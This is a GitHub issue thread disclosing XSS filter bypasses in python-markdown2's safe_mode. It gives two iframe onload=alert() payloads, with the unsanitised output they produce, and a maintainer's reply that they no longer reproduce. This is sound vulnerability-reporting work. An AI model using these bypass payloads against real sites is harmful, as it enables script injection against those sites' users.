### ISSUE TITLE
Filter bypass leading to XSS

### ISSUE THREAD

**Issue by terjanq** [trentm/python-markdown2#362]
The new regex `_incomplete_tags_re = re.compile("<(/?\w+?(?!\w).+?[\s/]+?)")` in https://github.com/trentm/python-markdown2/pull/351 introduced a more severe bypass on any HTML element by using a new line that does not match to `.+`. 

```py
In [2]: markdown2.markdown('<iframe\nonload=alert()//',safe_mode=True)
Out[2]: '<p><iframe\nonload=alert()//</p>\n'
```

Affected version == `2.3.9`

**Comment by nicholasserra** [comment]
Thank you for reporting this

**Comment by terjanq** [comment]
Found another bypass that the fix https://github.com/trentm/python-markdown2/pull/351 introduced.

```py
In [2]: markdown2.markdown("<http://<iframe/onload=alert()//.com>",safe_mode=True)
Out[2]: '<p><a href="http://<iframe/onload=alert()//.com">http://<iframe/onload=alert()//.com</a></p>\n'
```

That is because of the added lines in https://github.com/trentm/python-markdown2/pull/351/commits/0c0543846fa54281e2269b0bff841a0b9ffe23fe#diff-8562cc594a57b4deeda3ed2cb6208ba7R2172-R2174

That allows for `<http://link>` links without replacing.

**Comment by nicholasserra** [comment]
Doing some testing and doesn't look like these are valid anymore. First one not generating XSS for me in latest browsers and second one coming through as sanitized.
